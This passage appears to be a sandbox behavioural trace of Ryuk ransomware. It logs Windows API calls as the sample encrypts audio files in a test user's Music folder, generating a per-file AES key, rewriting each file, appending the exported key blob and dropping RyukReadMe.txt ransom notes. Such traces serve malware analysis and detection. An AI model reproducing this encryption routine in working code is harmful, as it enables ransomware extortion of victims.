lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0157.416] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0157.416] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0157.416] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0157.416] CloseHandle (hObject=0xd4) returned 1 [0157.446] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.450] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.450] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.450] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0157.450] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0157.450] SetLastError (dwErrCode=0x0) [0157.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\6adhg12pBbquMey\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yua2lr\\6adhg12pbbqumey\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0157.452] GetLastError () returned 0x0 [0157.452] WriteFile (in: hFile=0xe4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0157.453] CloseHandle (hObject=0xe4) returned 1 [0157.453] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.453] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.454] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\FMcJeUyvk0j.mp3", dwFileAttributes=0x80) returned 1 [0157.454] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\FMcJeUyvk0j.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yua2lr\\fmcjeuyvk0j.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0157.454] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=30971) returned 1 [0157.454] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=30971) returned 1 [0157.454] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0x77d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.454] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0157.455] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.455] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0157.455] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.455] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.455] ReadFile (in: hFile=0xe4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x78fb, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x78fb, lpOverlapped=0x0) returned 1 [0157.456] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0157.456] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x78fb, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x7900) returned 1 [0157.456] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.456] WriteFile (in: hFile=0xe4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7900, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x7900, lpOverlapped=0x0) returned 1 [0157.456] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0157.456] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.456] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.456] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0157.456] CloseHandle (hObject=0xe4) returned 1 [0157.472] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.477] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.477] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.478] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.478] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.478] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\GrQJ.m4a", dwFileAttributes=0x80) returned 1 [0157.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\GrQJ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yua2lr\\grqj.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0157.478] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=59953) returned 1 [0157.478] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=59953) returned 1 [0157.478] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0xe90f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.478] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0157.479] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.479] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0157.479] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.479] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.479] ReadFile (in: hFile=0xe4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xea31, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xea31, lpOverlapped=0x0) returned 1 [0157.480] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0157.480] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xea31, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xea40) returned 1 [0157.481] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.481] WriteFile (in: hFile=0xe4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xea40, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xea40, lpOverlapped=0x0) returned 1 [0157.481] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0157.481] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.481] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.481] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0157.481] CloseHandle (hObject=0xe4) returned 1 [0157.496] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.500] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.501] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.501] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.501] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.501] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\mmB0D1wYEJWN.mp3", dwFileAttributes=0x80) returned 1 [0157.501] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\mmB0D1wYEJWN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yua2lr\\mmb0d1wyejwn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0157.501] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=55452) returned 1 [0157.501] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=55452) returned 1 [0157.501] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0xd77a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.502] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0157.502] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.502] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0157.502] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.503] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.503] ReadFile (in: hFile=0xe4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd89c, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xd89c, lpOverlapped=0x0) returned 1 [0157.504] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0157.504] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xd89c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xd8a0) returned 1 [0157.504] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.504] WriteFile (in: hFile=0xe4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd8a0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xd8a0, lpOverlapped=0x0) returned 1 [0157.504] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0157.504] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.504] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.505] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0157.505] CloseHandle (hObject=0xe4) returned 1 [0157.520] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.524] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.524] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.525] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.525] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.525] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\SIXLFeIcL7SG4a4a.m4a", dwFileAttributes=0x80) returned 1 [0157.525] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\SIXLFeIcL7SG4a4a.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yua2lr\\sixlfeicl7sg4a4a.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0157.525] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=84762) returned 1 [0157.525] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=84762) returned 1 [0157.525] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0x149f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.525] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0157.526] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.526] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0157.526] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.526] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.526] ReadFile (in: hFile=0xe4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x14b1a, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x14b1a, lpOverlapped=0x0) returned 1 [0157.528] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0157.528] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x14b1a, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x14b20) returned 1 [0157.528] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.528] WriteFile (in: hFile=0xe4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14b20, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x14b20, lpOverlapped=0x0) returned 1 [0157.528] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0157.529] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.529] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.529] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0157.529] CloseHandle (hObject=0xe4) returned 1 [0157.546] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.550] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.550] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.550] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0157.550] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0157.550] SetLastError (dwErrCode=0x0) [0157.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yua2lr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.551] GetLastError () returned 0xb7 [0157.551] CloseHandle (hObject=0x190) returned 1 [0157.551] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0157.551] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0157.551] SetLastError (dwErrCode=0x0) [0157.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0157.551] GetLastError () returned 0xb7 [0157.551] CloseHandle (hObject=0x18c) returned 1 [0157.551] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0157.551] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.551] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\kxiEjH.wav", dwFileAttributes=0x80) returned 1 [0157.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\kxiEjH.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\kxiejh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0157.552] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=43270) returned 1 [0157.552] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=43270) returned 1 [0157.552] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xa7e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.552] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0157.552] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.552] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0157.552] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.553] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.553] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa906, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xa906, lpOverlapped=0x0) returned 1 [0157.553] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0157.553] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xa906, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xa910) returned 1 [0157.554] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.554] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa910, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xa910, lpOverlapped=0x0) returned 1 [0157.554] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0157.554] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, 